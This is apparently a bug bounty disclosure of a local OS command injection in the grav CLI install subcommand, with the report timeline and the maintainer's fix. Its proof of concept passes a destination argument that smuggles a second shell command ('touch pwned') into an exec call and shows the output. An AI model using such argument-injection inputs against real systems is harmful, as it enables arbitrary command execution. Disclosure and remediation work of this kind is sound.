Local Command Injection Post-Installation of Dependencies in getgrav/grav

Valid

Reported on

May 27th 2022


Description

grav version <= 1.7.33 is vulnerable to OS command injection. The install subcommand from the grav CLI is to install the dependencies needed by Grav, and accepts only the first argument as destination where to install/clone predetermined plugin/theme repositories/dependencies from this subcommand and concatenated without any validation and used by the exec method directly.

Proof of Concept

$ export DEST='x";touch pwned #"'
$ mkdir "$DEST" # to pass dependencies check
$ cp .dependencies .htaccess "$DEST" # to pass dependencies check
$ ./bin/grav install "$DEST"
# ...SNIPPED...
# Cloning Bits
# ============
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-problems -> x";touch pwned #"/user/plugins/problems
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-error -> x";touch pwned #"/user/plugins/error
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-markdown-notices -> x";touch pwned #"/user/plugins/markdown-notices
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-theme-quark -> x";touch pwned #"/user/themes/quark
#
$ find . -name "pwned"
./pwned

Found the file is created in the current working directory.

Impact

This issue leads to arbitrary command execution.

We are processing your report and will contact the getgrav/grav team within 24 hours. a month ago
Dwi Siswanto modified the report
a month ago
We have contacted a member of the getgrav/grav team and are waiting to hear back a month ago
We have sent a follow up to the getgrav/grav team. We will try again in 7 days. a month ago
We have sent a second follow up to the getgrav/grav team. We will try again in 10 days. 19 days ago
Matias Griese
12 days ago

I cannot see how this is a security issue rather than a bug. Nevertheless, it's fixed now.

Matias Griese modified the Severity from Medium to Low 12 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Matias Griese validated this vulnerability 12 days ago
Dwi Siswanto has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Matias Griese confirmed that a fix has been merged on de4af5 12 days ago
Matias Griese has been awarded the fix bounty
InstallCommand.php#L150 has been validated
to join this conversation